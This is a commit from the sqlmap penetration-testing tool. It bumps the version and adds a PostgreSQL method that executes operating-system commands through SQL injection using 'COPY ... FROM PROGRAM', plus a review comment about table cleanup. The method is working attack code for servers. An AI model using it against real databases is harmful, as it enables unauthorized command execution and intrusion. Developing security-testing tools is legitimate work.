
Commit ef5cb9a

committed
In preparation for #3545
1 parent 14186d3 commit ef5cb9a

3 files changed

Lines changed: 15 additions & 3 deletions


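--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.3.3.39"
+VERSION = "1.3.3.40"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)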

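--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -102,3 +102,15 @@ def uncPathRequest(self):
 self.createSupportTbl(self.fileTblName, self.tblField, "text")
 inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
 self.cleanup(onlyFileTbl=True)
+
+def copyExecCmd(self, cmd):
+# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
+self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
+self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
+inject.goStacked(self._forgedCmd)
+
+query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
+output = inject.getValue(query, resumeValue=False)
+
+return output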
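Review bot: copyExecCmd leaves its support table, and the command output stored in it, on the tested database: the method creates `self.cmdTblName`, reads it back with `inject.getValue` and returns without dropping it, whereas uncPathRequest directly above ends with `self.cleanup(onlyFileTbl=True)`. Unless a caller outside this hunk removes the table, it persists after the assessment, so consider dropping `self.cmdTblName` (or calling the class's own cleanup, if that covers this table) before `return output`. The method also has no docstring; one stating that `COPY ... FROM PROGRAM` needs PostgreSQL 9.3 or later and a superuser (or `pg_execute_server_program` member) session would tell callers when an empty result is more likely a permissions failure than a command with no output. As far as the hunk shows, `self._forgedCmd` is only used inside this method, so a local variable would avoid keeping the last command string on the instance.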

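--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,7 +50,7 @@ d5ef43fe3cdd6c2602d7db45651f9ceb lib/core/readlineng.py
 7d8a22c582ad201f65b73225e4456170 lib/core/replication.py
 3179d34f371e0295dd4604568fb30bcd lib/core/revision.py
 d6269c55789f78cf707e09a0f5b45443 lib/core/session.py
-e785996e0f9edd8e309094048dc40d05 lib/core/settings.py
+068159b771eef31a3852da30eba31ccd lib/core/settings.py
 4483b4a5b601d8f1c4281071dff21ecc lib/core/shell.py
 10fd19b0716ed261e6d04f311f6f527c lib/core/subprocessng.py
 10d7e4f7ba2502cce5cf69223c52eddc lib/core/target.py
@@ -199,7 +199,7 @@ d68b5a9d6e608f15fbe2c520613ece4a plugins/dbms/postgresql/filesystem.py
 a2ac0498d89797041bf65e4990cf8430 plugins/dbms/postgresql/fingerprint.py
 fb018fd23dcebdb36dddd22ac92efa2c plugins/dbms/postgresql/__init__.py
 290ea28e1215565d9d12ede3422a4dcf plugins/dbms/postgresql/syntax.py
-339bc65824b5c946ec40a12cd0257df1 plugins/dbms/postgresql/takeover.py
+cee109ef785cd1ebbc1df5311246094d plugins/dbms/postgresql/takeover.py
 014968f7b28abe3ca8e533843a017453 plugins/dbms/sqlite/connector.py
 6a0784e3ce46b6aa23dde813c6bc177f plugins/dbms/sqlite/enumeration.py
 3c0adec05071fbe655a9c2c7afe52721 plugins/dbms/sqlite/filesystem.py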
